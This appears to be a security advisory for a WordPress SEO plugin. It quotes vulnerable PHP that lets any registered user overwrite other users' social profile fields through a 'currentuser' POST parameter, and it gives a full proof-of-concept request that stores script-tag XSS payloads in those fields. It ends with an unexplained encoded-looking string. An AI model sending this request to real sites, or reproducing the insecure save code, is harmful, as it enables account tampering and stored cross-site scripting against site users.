Google SEO Pressor for Rich snippets [Unauthorized Profile Update]

Description

Google SEO Pressor for Rich snippets provides the functionality to store users social information like Facebook account, Twitter account etc. The function responsible for this action does not properly save user specific data to DB thus allowing a registered user to change this information for all other users.

The vulnerable code (mind the $_POST['currentuser'] param that is used to update the usermeta):

add_action( 'personal_options_update', 'yoursite_save_extra_user_profile_fields' );
add_action( 'edit_user_profile_update', 'yoursite_save_extra_user_profile_fields' );
function yoursite_save_extra_user_profile_fields( $user_id ) {
  $saved = false;
  if ( current_user_can( 'edit_user', $user_id ) ) {
    $profilelinks=array('gplus'=>$_POST['gplus'],'fbook'=>$_POST['fbook'],'twit'=>$_POST['twit'],'linkin'=>$_POST['linkin'],'latitude'=>$_POST['latitude'],'longitude'=>$_POST['longitude']);
    update_user_meta( $_POST['currentuser'], 'smack_social_links', $profilelinks );
    $saved = true;
  }
  return true;
}

In addition the provided input doesn’t get properly sanitized allowing to store raw HTML elements in DB.

PoC

POST /wp-admin/profile.php HTTP/1.1
Cookie: [COOKIES]

_wpnonce=[NONCE]
&checkuser_id=[YOUR USER ID]
&user_id=[YOUR USER ID]
&currentuser=[ANOTHER USER ID]
&gplus=<script>alert(/GooglePlus/)</script>
&fbook=<script>alert(/Facebook/)</script>
&twit=<script>alert(/Twitter/)</script>
&linkin=<script>alert(/LinkedIn/)</script>
&latitude=<script>alert(/Latitude/)</script>
&longitude=<script>alert(/Longitude/)</script>
&_wp_http_referer=/wp-admin/profile.php
&from=profile
&nickname=subscriber
&display_name=subscriber
&email=subscriber@example.com
&action=update
&submit=Update+Profile

INFO
GKxtL3WcoJHtnKZtqTuuqPOiMvOwqKWco3AcqUxX